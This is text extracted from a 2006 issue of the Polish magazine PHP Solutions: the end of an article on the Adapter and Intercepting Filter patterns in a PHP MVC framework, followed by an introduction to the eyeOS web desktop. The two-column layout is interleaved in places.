derowania szablonów dla naszego fra- Listing 5c. Implementacja Adaptera dla CacheLite.
meworka, bo nie ma takiego, który speł-
niałby oczekiwania wszystkich. Dlate- class CacheLiteCacheService
go klasy implementujące interfejs View {
są adapterami mechanizmów renderują- private $cacheEngine;
cych strony do różnych postaci.
public function __construct(array $options)

Intercepting Filter {
$this->setCacheEngine(new Cache_Lite($options));
Pisząc aplikację często zdarza się, że }
pewne operacje musimy powtarzać w public function set($key,$data)
każdym skrypcie na jego początku i koń- {
return $this->getCacheEngine()->save($data,$key);
cu (ang. preprocessing i postproces-
}
sing). Należą do nich na przykład otwie- public function get($key)
ranie połączenia do bazy i rozpoczyna- {
nie transakcji lub też otwieranie sesji. return $this->getCacheEngine()->get($key);
Tam gdzie dostęp do stron jest chronio- }
public function remove($key)
ny hasłem, jedną z pierwszych operacji,
{
jaką wykonujemy, jest sprawdzanie czy return $this->getCacheEngine()->remove($key);
osoba, która wywołuje daną stronę, jest }
zalogowana. public function exists($key)
Jeżeli korzystamy z jakiegoś fra- {
if ( $this->getCacheEngine()->get($key) )
meworka MVC nasz problem sprowa-
{
dza się do wprowadzania odpowiednie- return true;
go kodu w pliku, który wywołuje Front }
Controller. Jeżeli aplikacja składa się z
niezależnych skryptów, możemy w każ- return false;
}
dym z nich umieszczać odpowiednie in-
// gettery i settery zostały pominięte
cludy – będą one wykonywać pożądane }
przez nas działania. Każde z tych roz-
wiązań ma swoje wady i zalety. W przy-

34 www.phpsolmag.org PHP Solutions Nr 3/2006


padku umieszczania kodu w pliku Front
Controllera powodujemy, że staje się
on charakterystyczny dla naszej aplika-
cji, jego kod przestaje być możliwy do
przeniesienia. W sytuacji, gdy na każdej
stronie umieszczamy odpowiednie inclu-
dy problem jest oczywisty – zawsze mo-
żemy zapomnieć to zrobić.
Kod, który napiszemy w includach,
czy też w Front Controllerze jest czę-
ścią naszej aplikacji, a nie „ustanda-
ryzowanego API” frameworka, zatem
z dużym prawdopodobieństwem przy
tworzeniu następnego projektu będzie-
my musieli go skopiować. A to ozna-
cza, że nasza czerwona lampka powin-
na się ponownie zapalić, zadając jed-
nocześnie pytanie: czy nie da się te-
go rozwiązać lepiej?. Oczywiście, że
tak. Z pomocą przychodzi nam wzo-
rzec Intercepting Filter. Wzorzec ten
pojawia się w literaturze w dwóch od-
mianach , w których filtry stanowią łań-
cuch i każdy filtr wywołuje swojego na-
stępcę. Ostatnim filtrem jest najczę-
ściej akcja, którą chciał wykonać użyt-
kownik. Druga implementacja, naszym
zdaniem bardziej odpowiednia, pokaza-
na jest na Listingu 4. Dla lepszego zro-
zumienia, Rysunek 2 przedstawia dia-
gram sekwencji dla tej klasy. Teraz każ-
da akcja wykonana przez front kontroler
może zostać poprzedzona wywołaniem
filtra, na którym to zostanie wykonana
metoda doPreProcessing. Po wykona-
niu akcji na tymże filtrze zostanie wy-
konana metoda doPostProcessing. Po-
nadto w przypadku, gdy pojawi się ja-
kiś wyjątek, zostanie wykonana metoda
doExceptionProcessing. W ten sposób
utworzyliśmy jeden wspólny interfejs do
implementacji czynności wykonywanych
zawsze na końcu i początku skryptu.
Udało się nam również stworzyć mecha-
nizm, który będzie reagował na wyjątki,
i tak np. w przypadku filtru otwierające-
go połączenie do bazy i rozpoczynają-
cego transakcję przed zamknięciem po-
łączenia, transakcja zostanie zrollbaco-
wana. Metoda doExceptionProcessing
jako jeden ze swoich parametrów pobie-
ra obiekt wyjątku, tak więc każda z im-
plementacji tej metody może w zależ-
ności od typu wyjątku zareagować w in-
ny sposób, co w połączeniu ze stoso-
waniem w kodzie nazwanych wyjątków
jest bardzo silnym narzędziem. Mecha-
nizm ten można łatwo wykorzystać do
logowania wyjątków i do przekierowy-
PHP Solutions Nr 3/2006
Wzorce projektowe Techniki
Listing 6. Przykładowe implementacje wzorca Intercepting Filter
interface InterceptingFilter
{
public function doPreProcessing(HttpRequest $request);
public function doPostProcessing(HttpRequest $request,
ModelAndView $modelAndView = NULL);
public function doExceptionProcessing(HttpRequest $request,
Exception $exception, ModelAndView $modelAndView = NULL);
}
-------------------------------------------------------------
class SessionFilter implements InterceptingFilter
{
public function doPreProcessing(Request $request)
{
session_start();
}
public function doPostProcessing(Request $request,
ModelAndView $modelAndView = NULL)
{
}
public function doExceptionProcessing(Exception $exception,
Request $request, ModelAndView $modelAndView = NULL)
{
}
}
wania użytkownika na stronę z infor- też temat dobrych praktyk, jakie należy
macją o czasowym niedziałaniu serwi- stosować programując obiektowo. Po-
su. Zwróćcie uwagę, że takich stron mo- wiedzieliśmy o tym, jak ważne jest stoso-
że być wiele, tzn. jedna dla każdego ty- wanie nazwanych wyjątków i tzw. Trans-
pu wyjątku. Listing 6 przedstawia przy- fer Objects.
kładowe implementacji wzorca Intercep- W artykule nie udało się nam zamie-
ting Filter. ścić wszystkich przykładów, które poka-
zują prostotę i elastyczności naszego
Podsumowanie rozwiązania, dlatego pod adresem http://
W artykule pokazaliśmy, jak przy pomo- flexi.sourceforge.net/ umieściliśmy cały
cy jednej z najbardziej podstawowych framework wraz z forum, na którym mo-
technik programowania obiektowego żecie wypowiedzieć się na temat nasze-
– kompozycji można zbudować aplika- go kodu. Kod umieszczony na WWW za-
cję o dużej funkcjonalności. Dzięki kom- wiera dużo więcej potrzebnych i intere-
pozycji osiągnęliśmy cel, o którym by- sujących przykładów. n
ła mowa w pierwszym artykule tej serii.
Klasa FrontControllerImpl ma prostą
implementację, jest zrozumiała i czytel-
na. Jednocześnie jest bardzo elastycz-
O autorze
na i przygotowana na rozbudowę. Tym
samym zakończyliśmy budowę tej czę- Piotr Szarwas jest pracownikiem SUPER-
ści frameworka MVC. W następnym ar- MEDIA Interactive i doktorantem na wy-
dziale Fizyki Politechniki Warszawskiej.
tykule powiemy więcej o akcjach. Od 2003 roku projektuje aplikacje WWW
Poza rozbudową klasy Front Con- w oparciu o PHP4/5. Obecnie zajmuje się
trollera zaprezentowaliśmy dwa bardzo tworzeniem frameworka dla PHP oparte-
ważne wzorce programistyczne Adapter go na rozwiązaniach Hibernate i Spring.
Kontakt z autorem:
i Intercepting Filter. Zgodnie z obietnica- piotr.szarwas@gmail.com
mi z pierwszego artykułu poruszyliśmy
www.phpsolmag.org 35
Narzędzia

Projekt eyeOS: rewolucja

w interfejsach webowych PHP
Stopień trudności: lll
Steven Mautone i Pau Garcia-Milà

Wyobraźmy sobie, że nasze aplikacje webowe

nie mają już surowego, sztywnego interfejsu.
Są elastyczne i umożliwiają uruchamianie
wielu aplikacji w jednym oknie przeglądarki
– w ramkach o dowolnym rozmiarze, które
można przeciągać, minimalizować i przywracać.
Wyobraźmy sobie pulpit WWW z paskiem zadań
i koszem na śmieci, dobrze znanym z KDE,
GNOME czy systemów MS Windows i MacOS.
To nie sen – to eyeOS, pierwszy graficzny
system operacyjny napisany w czystym PHP
i JavaScript.

W SIECI
1. http://www.eyeos.org
– strona domowa projek-
tu eyeOS
2. http://www.eyeapps.org
– repozytorium aplikacji
eyeOS
C
elem projektu jest opracowanie
graficznego środowiska spełnia-
jącego wszystkie potrzeby infor-
matyczne firm i użytkowników domowych
za pomocą PHP i serwera WWW. eyeOS
ma wszędzie i w każdej chwili zapewniać
dostęp do takich aplikacji, jak procesor
tekstu, terminarz, menedżer plików czy
komunikator.
Uruchomienie eyeOS
Po zainstalowaniu eyeOS (patrz Ramka In-
stalacja), np. w katalogu localhost/eyeos/,
uruchamia się go poprzez wprowadze-
nie podstawowego URL w przeglądarce in-
ternetowej. Wyświetli się ekran logowa-
nia, na którym można też wybrać język in-
terfejsu. Po zalogowaniu zobaczymy ekran
z ładną tapetą. U góry okna znajduje się bel-
ka aplikacji (oficjalnie zwana dokiem aplika-
cji) z ikonami: można tu wybrać jedną z wbu-
dowanych aplikacji, które omówimy później,
lub dodać nową za pomocą pomarańczowej
ikony ze znakiem + po prawej. W dolnym le-
wym rogu ekranu umieszczono małą ikonę
umożliwiającą wylogowanie oraz zegar cy-
frowy pokazujący aktualny czas.
Aplikacje, czyli
zamieniamy czarno-
biały TV na kolorowy
Kliknijmy w znajdującą się na belce apli-
kacji ikonę z koncentrycznymi kręgami.
Pojawi się okno aplikacji eyeHome, od-
powiednika Mojego Komputera w MS
Windows (Rysunek 1). Jak widać, jest
ono podzielone na dwa panele: lewy za-
tytułowany Actions i prawy bez podpisu.
Co należy wiedzieć...
Powinieneś znać podstawy obsługi śro-
dowisk graficznych.
Co obiecujemy...
Po przeczytaniu artykułu będziesz wie-
dział jak uruchomić i wykorzystać własny
system eyeOS.

36 www.phpsolmag.org PHP Solutions Nr 3/2006


Rysunek 1. eyeHome – centralne miejsce systemu eyeOS
Po lewej stronie można dodać nowy do-
kument lub kontakt, wysłać wiadomość
do wybranego użytkownika albo zainsta-
lować nową aplikację, czy przeczytać wła-
sną pocztę.
Prawy panel pokazuje zawartość ka-
talogu domowego (pliki). Trzy ikony przy
każdym pliku umożliwiają ich otwieranie,
pobieranie do lokalnego komputera oraz
kasowanie. eyeOS pozwala także umiesz-
czać własne pliki w katalogu domowym
systemu. Usunięte pliki są przenoszone
do kosza, tak samo jak w MS Windows
czy KDE. Jeśli umieścimy coś w koszu, je-
go ikona zmieni kolor.
Zajmijmy się teraz oknami. Można je
dowolnie przemieszczać na ekranie. Robi-
Listing 1. Zawartość pliku proprie-
tats.xml – podstawowe parametry
aplikacji SampleApp.eyeApp
<?xml version="1.0"?>
<SampleApp>
<title>Sample App</title>
<version>v. 1.0</version>
<author>Pau Garcia-Milà</author>
<window>
<height>700</height>
<width>575</width>
<resize>no</resize>
<fullscreen>no</fullscreen>
<x_pos>-1</x_pos>
<y_pos>-1</y_pos>
</window>
<state />
</SampleApp>
PHP Solutions Nr 3/2006
eyeOS – system operacyjny w PHP
my to klikając dolną krawędź okna lub je-
go górną część (belkę tytułową) i przecią-
gając je. Jest to funkcjonalność niespoty-
kana dotąd w aplikacjach PHP. Inną no-
wością jest fakt, że te same czynności wy-
konane na dolnym prawym rogu okna po-
zwalają swobodnie zmieniać jego rozmiar
(jeżeli widoczna jest ikona zmiany rozmia-
ru). Trzy przyciski w górnym prawym rogu
służą odpowiednio do minimalizacji, otwie-
rania w trybie pełnoekranowym oraz za-
mknięcia okna. Operacje te są dostępne
dla wszystkich okien, chyba że uniemoż-
liwili je twórcy aplikacji.
Zwróćmy też uwagę na dok aplikacji
i podświetloną ikonę katalogu eyeHome.
To samo dotyczy wszystkich otwartych
programów systemu. Aplikacja eyeOS mo-
że działać w trzech trybach: normalnym
oknie, pełnym ekranie lub w trybie minima-
lizacji. Ikona w doku aplikacji zostanie od-
powiednio podświetlona. Od wersji 0.8.x
systemu eyeOS wprowadzono także moż-
liwość jednoczesnego uruchamiania wielu
aplikacji, przy zachowaniu możliwości ich
minimalizowania.
Edycja tekstu w eyeOS
Przyjrzyjmy się bliżej wbudowanym w sys-
tem aplikacjom. Po kliknięciu New Docu-
ment w oknie, które opisywaliśmy, lub w
drugą ikonę w doku aplikacji u góry ekra-
nu pojawi się edytor tekstu WYSIWYG
(Rysunek 3). Umożliwia on wybranie kil-
ku krojów czcionek i ustawienie ich roz-
www.phpsolmag.org
Narzędzia
miaru, stylu (pogrubiony, kursywa, podkre-
ślony), wyjustowanie tekstu, a także wpro-
wadzanie list uporządkowanych i nieupo-
rządkowanych, linii poziomych, tabel, ry-
sunków itd. Choć nie jest to pierwszy edy-
tor WYSIWYG w historii PHP (istnieje już
np. FCK), może on służyć jako przykład
możliwości eyeOS.
Jeśli chcemy ukryć edytor, wystarczy
kliknąć pierwszą ikonę w prawym gór-
nym rogu okna. Ikona aplikacji pojawi
się w dolnym lewym rogu ekranu, w doku
zminimalizowanych aplikacji, gdzie znaj-
dują się ikony wszystkich ukrytych dzia-
łających programów. Po najechaniu na
nie kursorem wyświetli się nazwa każ-
dej aplikacji, a kliknięcie przywróci okno
wraz z zawartością na ekran. Kliknię-
cie w okno eyeHome umieszczone za
oknem edytora spowoduje przeniesienie
go na pierwszy plan – tak, jak w innych
graficznych systemach operacyjnych.
Tekst można również zapisać w katalogu
domowym w celu późniejszej edycji.
Inne wbudowane aplikacje
Oczywiście wbudowane aplikacje to
nie tylko eyeHome i eyeEdit. Sprawdź-
my inne programy wyświetlone w doku
aplikacji:
• eyeCalendar – menedżer harmono-
gramów i notatek,
• eyePhones – menedżer kontaktów
umożliwiający dodawanie szczegó-
łowych informacji o osobach lub fir-
mach,
• eyeCalc – kalkulator,
• eyeMessages – systemowa usługa
przesyłania wiadomości przypomina-
jąca lokalną pocztę elektroniczną lub
funkcję prywatnych wiadomości na fo-
rach dyskusyjnych,
• eyeBoard – tablica ogłoszeń,
• eyeNav – przeglądarka internetowa,
Rysunek 2. Działający pulpit eyeOS
37
Narzędzia eyeOS – system operacyjny w PHP

• eyeOptions – narzędzie do konfigu-

racji systemu; umożliwia zmianę ta-
pety i motywu, ustawienie hasła i ho-
sta eyeOS oraz dodawanie i usuwa-
nie kont użytkowników (Rysunek 4),
• eyeInfo – informacje o twórcach ey-
eOS, otwartych aplikacjach oraz uży-
wanych wersjach systemu operacyj-
nego i PHP,
• eyeApps – menedżer aplikacji (poma-
rańczowa ikona ze znakiem +).

eyeNav to prawdziwa przeglądarka dzia-

łająca w oknie przeglądarki, pozwalająca
poruszać się po zasobach WWW. Moż-
na w niej nawet otworzyć kolejną sesję
eyeOS – razem z kalkulatorem urucho-
mionym wewnątrz zagnieżdżonego okna
eyeOS (Rysunek 5).
Rysunek 3. eyeEdit, edytor WYSIWYG napisany w PHP
Instalacja i usuwanie
aplikacji ry przypomina nieco programy Winamp bie systemowym (dla wszystkich użytkow-
Spróbujmy zainstalować nowe aplikacje. i XMMS. Wszystkie pakiety aplikacji dla ników), pliki zostaną umieszczone w folde-
Służy do tego, jak już wiemy, eyeApps (od systemu eyeOS mają rozszerzenie .ey- rze etc/apps/eyeAmp; w przeciwnym wy-
eyeOS w wersji 0.8.x). Najpierw jednak eApp.tar.gz. Spróbujmy zatem zainstalo- padku znajdą się w katalogu użytkownika
należy pobrać ze strony http://eyeapps.org wać pakiet eyeAmp.eyeApp.tar.gz.. Pobie- (usr/root/apps/eyeAmp).
odpowiednie pliki, które są podzielone na ramy go i uruchamiamy eyeApps (Rysu- Instalacja jest zakończona, jednak
kilka kategorii: Games (gry 2D i 3D, zwy- nek 6), które udostępnia dwie opcje: Ma- zapewne warto byłoby umieścić ikonę
kle napisane w języku Java), Multimedia nage Apps oraz Install Apps. Wybieramy eyeAmp na ekranie. Nie jest to proble-
(odtwarzacze), Office (arkusze kalkulacyj- oczywiście drugą z nich, klikamy przycisk mem – jedynym ograniczeniem jest fakt,
ne, programy graficzne itd.), Widgets oraz Browse i wybieramy plik. że maksymalna liczba widocznych ikon
Internet (aplikacje siecowe, na przykład Następnie możemy zdecydować, czy wynosi 10. Trzeba więc ponownie uru-
systemy chat). aplikacja będzie dostępna dla wszystkich chomić eyeApps, wybrać opcję Mana-
użytkowników, czy też wyłącznie dla aktu- ge apps i ukryć ikonę innej aplikacji. (na
Gra muzyka alnego użytkownika. Po kliknięciu strzałki przykład eyeBoard) przez jej odznacze-
Zainstalujemy odtwarzacz muzyczny z ka- aplikacja zostanie rozpakowana i zainsta- nie na liście. Następnie trzeba aktywo-
tegorii Multimedia o nazwie eyeAmp, któ- lowana. Jeśli wybraliśmy instalację w try- wać ikonę eyeAmp, kliknąć opcję Update
the configuration pod listą aplikacji i za-
mknąć okno.
Wymagania Spróbujmy uruchomić eyeAmp. Apli-
eyeOS wymaga serwera WWW z obsługą PHP. Zalecamy używanie systemów Linux/Un*x
z serwerem Apache 1.3.x lub 2.0.x oraz PHP 4.3.x albo 5.0.x. Działa on głównie w opar- kacja odtwarza muzykę w formacie
ciu o pliki i nie wymaga bazy danych. Konieczna jest jednak możliwość wysyłania plików i MP3, jednak pliki dźwiękowe muszą być
katalogów na serwer oraz posiadanie praw pozwalających na zmianę uprawnień do kata- umieszczone w katalogu domowym sys-
logów. Przeglądarka musi być zgodna ze standardami, a także obsługiwać CSS. Mecha-
temu eyeOS (np. /home/root) ręcznie lub
nizm graficzny eyeOS stosuje pliki PNG z kanałem alfa - aby optymalnie wykorzystać sys-
tem, przeglądarka powinna je obsługiwać. za pomocą funkcji wysyłania plików apli-
kacji eyeHome. Umieśćmy w katalogu do-
mowym kilka plików i odtwórzmy je (Rysu-
Instalacja nek 7). To naprawdę działa!
Pobieramy najnowszą wersję systemu eyeOS ze strony http://www.eyeos.org. Jest ona
obecnie dostępna w dwóch formatach plików: .tar.gz z kodem źródłowym i .exe z wersją Usuwanie aplikacji jest również bar-
MiniServer dla Windows. Pakiet eyeOS MiniServer zawiera miniaturową wersję serwera dzo łatwe. Po uruchomieniu eyeApps
Apache dla Windows oraz zmodyfikowaną przeglądarkę Firefox. i wybraniu opcji Manage Apps klikamy
Wersja .tar.gz również ma instalator: wystarczy rozpakować eyeOS do folderu w publicz-
ikonę usuwania (zielony X) po prawej
nym katalogu WWW i otworzyć w przeglądarce odpowiedni adres. Instalator zapyta o wy-
bór języka (dostępnych jest kilka wersji, m.in. angielska, polska, niemiecka, francuska i stronie aplikacji, którą chcemy odinsta-
włoska) oraz o hasło (z potwierdzeniem) użytkownika root. Po kliknięciu odnośnika Ad- lować, a następnie potwierdzamy wybór.
vanced Security Parameters (zaawansowane parametry zabezpieczeń) można ustawić Proces deinstalacji odbywa się automa-
między innymi takie opcje, jak nazwa użytkownika-administratora (domyślnie root), kata-
tycznie – aplikacja nie zostawi żadnych
log domowy (domyślnie home, a także katalogi, w których będą przechowywane wiado-
mości przychodzące, notatki i aplikacje. Po potwierdzeniu instalacji system będzie goto- plików – śmieci na serwerze. Nie można
wy do użytku. jednak usunąć aplikacji wbudowanych,
takich jak eyeCalc.

38 www.phpsolmag.org PHP Solutions Nr 3/2006

 eyeOS – system operacyjny w PHP Narzędzia

System plików eyeOS

Przyjrzyjmy się bliżej strukturze sys-
temu eyeOS. Za pomocą dowolnego
menedżera plików lub polecenia sys-
temowego (ls w *niksach, dir w DOS/
Windows) można przeglądać system
plików eyeOS, złożony z następujących
katalogów:

• apps – wbudowane aplikacje,

• Docs – dokumentacja systemu,
• etc – aplikacje systemowe, motywy
i inne ustawienias,
• home – katalogi z danymi użytkow-
ników (tak jak w Linuksie), np. root;
umieszczane są w nich pliki wysłane
za pomocą eyeHome,
• system – właściwy system, łącznie
z podstawowymi narzędziami do in-
stalacji i konfiguracji oraz motywami
graficznymi,
• usr – kolejny katalog na foldery do-
mowe (takie jak root), w którym prze-
chowywane są nowo zainstalowane
aplikacje (poza wbudowanymi) dla
pojedynczych użytkowników, wiado-
mości przychodzące, książka telefo-
niczna i wpisy kalendarza, notatki,
a także osobisty kosz.
W katalogu głównym znajdują się rów-
nież trzy pliki: index.php (strona głów-
na), desktop.php i sysdefs.php.
Historia i rozwój
systemu eyeOS
Projekt eyeOS powstał we wrześniu
2004 r. jako pomysł na stworzenie we-
bowego systemu operacyjnego. Wer-
sja alfa została wydana 1 sierpnia 2005
r. Od tego czasu projekt niezwykle się
rozwinął. Aktualna wersja 0.8.10 zbliża
projekt zwany przez członków zespo-
łu Web Desktop Environment do peł-
nego wykorzystania możliwości tech-
nologii AJAX.
Następna wersja eyeOS będzie całko-
wicie oparta na tej technologii (pisali-
śmy o AJAX w artykułach „AJAX – wy-
jątkowo interaktywne i wydajne aplika-
cje WWW” oraz „advAJAX, czyli prak-
tyczne zastosowanie technologii AJAX”
w numerze 1/2006 magazynu PHP So-
lutions), co pozwoli na znaczne zwięk-
szenie wydajności systemu (np. unik-
nięcie ponownego ładowania całe-
go pulpitu, co ma miejsce choćby pod-
czas zmiany używanej aplikacji). Na-
stępne wydanie eyeOS będzie dodatko-
wo zawierać kompletne API do tworze-
nia aplikacji. Zespół eyeOS jest w trak-
cie przygotowywania odpowiedniej do-
kumentacji.
Rysunek 4. eyeOptions, panel konfiguracyjny eyeOS
Jak widać, system plików eyeOS jest
dość zaawansowany, a przy okazji do-
brze rozplanowany. Przypomina nieco
linuksową lub *niksową hierarchię kata-
logów.
Rdzeń eyeOS
Zapoznajmy się bliżej z innymi funkcja-
mi, ukrytymi głęboko w systemie eyeOS.
Jego rdzeń (część główna) został napi-
sany w PHP, ale już sam interfejs jest re-
alizowany przez kod HTML, który gene-
ruje kod stworzony w PHP.
Na wszystkich stronach do zarządzania
funkcjami okien eyeOS wykorzystywany
jest JavaScript.
Wszystkie dane rdzenia eyeOS są
przechowywane w strukturze XML. SYs-
tem eyeOS ma własne funkcje XML, po-
nieważ obsługa XML (a dokładnie sim-
pleXML) jest dostępna tylko w najnow-
szej serii – PHP5, a twórcy XML chcie-
li także zapewnić obsługę XML przez
PHP4. Znaczniki te są dostosowane do
eyeOS, jednak nie nadają się do ogól-
nych zastosowań.
Jak już wiemy, podstawowe defini-
cje systemu są przechowywane w pliku
sysdefs.php, który znajduje się w katalo-
gu głównym eyeOS. Są to stałe zdefinio-
wane za pomocą wyrażenia define(). Ich
domyślne wartości są następujące:
• SYSINFO – nazwa pliku z parametrami
systemu, (etc/system.php)
• BBOARD – plik forum dyskusyjnego
(etc/taulell.php),
• HOMEDIR – katalog z wszystkimi plikami
użytkownika, (home)
• USRDIR – katalog z plikami kontrolnymi
użytkownika (usr),
• ROOTUSR – nazwa użytkownika root
(root),
• USRINFO – nazwa pliku z parametrami
użytkowników (usrinfo.php),
• MSGDIR – nazwa katalogu z wiadomo-
sciami (Inbox),
• NOTEDIR – nazwa katalogu z notatkami
(eyeEdit,)
• SYSAPPS – nazwa katalogu z zainsta-
lowanymi aplikacjami ogólnosyste-
mowymi (etc/apps/),
W tym samym pliku znajdują się także
ustawienia systemu okien:
• WINDOW_HEIGHT – wysokość (200),
• WINDOW_WIDTH – szerokość (350),
• WINDOW_START, WINDOW_INC – pozycje
zmiennych okien (60, 40),
• SYSFMT_DATE – format daty systemowej
(d/m/Y = dzień/miesiąc/rok),
• SYSFMT_TIME – format czasu systemo-
wego (H:i = godzina:minuta),
• MAXICONS – maksymalna liczba ikon
(11).
Pulpit eyeOS, podobnie jak pulpit w trady-
cyjnych systemach, można całkowicie do-
stosować do indywidualnych potrzeb, od
ekranu logowania po menedżer okien. Ta-
ka elastyczność pozwala użytkownikom
tworzyć własny pulpit, zgodny z wymaganą
funkcjonalnością i osobistymi preferencjami.

PHP Solutions Nr 3/2006 www.phpsolmag.org 39

Narzędzia eyeOS – system operacyjny w PHP

Przykładowa aplikacja SampleApp.

eyeApp powinna zawierać plik propie-
tats.xml w takiej postaci, jaką przedsta-
wiono na Listingu 1.
W rzeczywistości wszystkie te infor-
macje są opcjonalne, ponieważ system
użyje wartości domyślnych dla wszyst-
kich niezdefiniowanych pól – konieczne
jest tylko, aby plik ten istniał.
Niektóre ogólne cechy plików XML
systemu eyeOS są następujące:

• Wartości atrybutów muszą być po-

dawane w pojedynczych lub po-
dwójnych cudzysłowach, w prze-
ciwnym wypadku zostaną zignoro-
wane.
• Niepoprawne dane wejściowe są od-
rzucane bez komentarza.
• eyeOS nie rozróżnia wielkich i małych
Rysunek 5. Okno przeglądarki z kalkulatorem umieszczone w innym oknie przeglądarki liter w nazwach znaczników, ale par-
ser dopasuje znaczniki otwierające do
Tworzenie własnych • applic.php – kod aplikacji (plik główny; zamykających wyłącznie wtedy, gdy
pakietów aplikacji inne pliki są również dozwolone). będą identyczne.
eyeOS • Znaczniki i atrybuty są traktowane jed-
Proces tworzenia pakietu instalacyjnego Wszystkie wymienione pliki są konieczne, nakowo – kod z Listingu 1 może rów-
z nową aplikacją (eyeApp) jest całkiem aby aplikacja została rozpoznana przez nież wyglądać następująco:
prosty. Wystarczy tylko umieścić pliki eyeOS.
w katalogu o nazwie NAZWAAPLIKACJI. <Sample title='Sample App'
eyeApp i skompresować go w pliku .tar.gz Ustawianie najważniejszych version='v. 1.0'
o nazwie w formacie NAZWAAPLIKACJI. parametrów aplikacji author='Pau Garcia-Milà'>
eyeApp.tar.gz. Zajmijmy się plikiem propietats.xml. W <window height='700' width='575'
Jednak przed kompresją katalogu mu- nim właśnie definiujemy parametry uży- noresize='1' nofullscreen='1' x_pos='-1
simy umieścić w nim podstawowe pliki wane przez system podczas tworzenia y_pos='-1' /
aplikacji eyeOS. Każda aplikacja wymaga okna aplikacji. Można go także użyć do <state />
obecności pięciu plików: podawania kodowi aplikacji danych o pa- </Sample>
rametrach.
• ico_a.png – ikona minimalizacji; po-
jawia się w belce zminimalizowa-
nych aplikacji. Aby móc tworzyć iko-
ny zgodne z domyślnym motywem
ikon eyeOS, należy pobrać ze strony
projektu (http://www.eyeos.org/docs/
eyeOS_Icon.xcf) plik .xcf do obróbki w
programie Gimp, zawierający wszyst-
kie potrzebne warstwy.
• ico_b.png – ikona aktywnej aplikacji;
grafika ta jest wyświetlana na belce
ikon. Podczas tworzenia tej ikony za-
lecamy stosowanie wyższych warto-
ści alfa niż w przypadku ico_c.png, co
pozwoli odróżnić aplikację aktywną od
nieaktywnej.
• ico_c.png – ikona aplikacji nieaktyw-
nej, wyświetlana w doku aplikacji. Za-
lecamy wartość alfa 50%.
• propietats.xml – parametry związane
z określoną aplikacją, które omówimy
później. Rysunek 6. eyeApps, narzędzie do zarządzania aplikacjami systemu eyeOS

40 www.phpsolmag.org PHP Solutions Nr 3/2006


Rysunek 7. eyeAmp – odtwarzacz MP3
• Plik The propietats.xml jest ładowa-
ny wyłącznie podczas startu aplika-
cji. Dodatkowo jeżeli USRDIR aktualne-
go użytkownika zawiera plik XML o na-
zwie takej samej, jak nazwa aplikacji,
to jest on również odczytywany i doda-
wany do danych aplikacji. Jeśli obiekty
się dublują, pierwszeństwo ma wersja
USR. Nazwa głównego znacznika w
zasadzie nie jest używana, warto jed-
nak zdefiniować nazwę aplikacji, dzięki
czemu będzie wiadomo, jaka aplikacja
jest definiowana. Należy zwrócić uwa-
gę, że w danych aplikacji USR nazwa
główna musi być taka sama, jak w pli-
ku propietats.xml.
• Informacje są zapisywane w wewnętrz-
nej strukturze eyeOS, appinfo, do cza-
su zakończenia działania aplikacji.
• Tytuł jest opcjonalny. Jeżeli jest okre-
ślony i nie jest pusty, zastępuje nazwę
aplikacji wyświetlaną u góry okna.
• Wartość pola informacji o wersji (jeśli
zdefiniowana) jest dodawana do tytu-
łu okna.
• Podstruktura okna definiuje jego atry-
buty. Zwykle wymagane są wysokość
i szerokość, ale jeśli jednej z warto-
ści brakuje, ustawiane są domyślne
wartości systemowe (podane w sys-
defs.php).
• Jeśli atrybut zmiany rozmiaru nie jest
pusty, zaleca się stosowanie wartości
'no'.
• Jeśli atrybut pełnego ekranu nie jest
pusty, zaleca się stosowanie wartości
'no'.
PHP Solutions Nr 3/2006
eyeOS – system operacyjny w PHP
• Znaczniki definiujące pozycję w pio-
nie i poziomie (x-pos i y-pos) mogą
być użyte do poprawienia początko-
wej pozycji okna.
• Domyślne wartości -1 znaczników
x-pos i y-pos powodują, że okno jest
otwierane przy górnej lewej krawędzi
ekranu, zaś kolejne okna bez usta-
wionej pozycji są otwierane w stałej
odległości od poprzednich.
Kompletna struktura aplikacji jest okre-
ślona w pliku applic.php. Plik powinien
rozpoczynać się od wyrażenia
if (!defined ('USR')) return;
Dane systemowe oraz dane konkretnych
aplikacji są podawane jako zmienne glo-
balne. Pierwszą zmienną jest $appinfo[]
– tablica zawierająca dane aplikacji i sys-
temowe, pobierane głównie z pliku propie-
tats.xml. Na przykład appdir określa ka-
talog z plikami aplikacji. Jest ona później
używana do inkluzji innych plików PHP
z katalogu aplikacji:
include $appinfo['appdir'].'CODEFIL
E';,
gdzie CODEFILE jest nazwą tego pliku.
Zauważmy, że jeżeli strona zawiera
nagłówki HTML (<html><head>...</head>...)
lub wymaga plików CSS, powinna ona być
umieszczona jako obiekt iframe – w prze-
ciwnym razie system zarządzania okna-
mi eyeOS zostanie uszkodzony. Aby użyć
www.phpsolmag.org
Narzędzia
obiektu iframe, należy umieścić w kodzie
następujące wiersze:
echo "<iframe src='".$appinfo['appdir'].
"NAZWASTRONY.htm'" style='width:
XXpx; height: YYpx' frameborder='0'>
</iframe>";
Oczywiście NAZWASTRONY musi być za-
mieniona na nazwę pliku HTML, który
ma być umieszczony, XX należy zastąpić
szerokością obiektu iframe, a YY jego wy-
sokością (oba wymiary powinny być o kil-
ka pikseli mniejsze od rozmiaru okna).
Aby zakończyć tworzenie pakietu, wy-
starczy skompresować do pliku .tar.gz pięć
plików aplikacji (razem z dodatkowymi pli-
kami, jeśli istnieją) umieszczonych w kata-
logu NAZWAAPLIKACJI.eyeApp.
Podsumowanie
Udowodniliśmy, że eyeOS wnosi nową
jakość graficznego interfejsu użytkowni-
ka do świata PHP. Odtwarzacze multime-
diów, edytory tekstu, chaty, fora dyskusyj-
ne, aplikacje CMS, ERP czy CRM – nie
ma takiej aplikacji PHP, której nie dałoby
się przekonwertować do systemu eyeOS.
W ciągu najbliższych kilku lat pojawą się
tysiące aplikacji wykorzystujących eyeOS,
biorąc pod uwagę fakt, że pracuje nad tym
aktywna i dobrze zorganizowana wspólno-
ta eyeOS. Precz z przestarzałymi, topor-
nymi, niewygodnymi i niewydajnymi inter-
fejsami webowymi. Niech żyje rewolucja
PHP/eyeOS!
W następnym numerze zbudujemy
aplikację dla eyeOS, przy okazji pokazu-
jąc mechanizmy rządzące systemem. n
O autorach
Steven Mautone rozpoczął swoją pracę
z Internetem od tworzenia serwisów dla
małych firm. Obecnie kończy pracę ma-
gisterską na Indiana University. Steven
jest business managerem projektu ey-
eOS, dba o ekspansję systemu eyeOS.
Pau Garcia-Milà od wielu lat tworzy por-
tale internetowe. Jeden z nich, www.pam-
tomaket.com, otrzymał wsparcie od rządu
Catalonii i posiada około 1400 użytkowni-
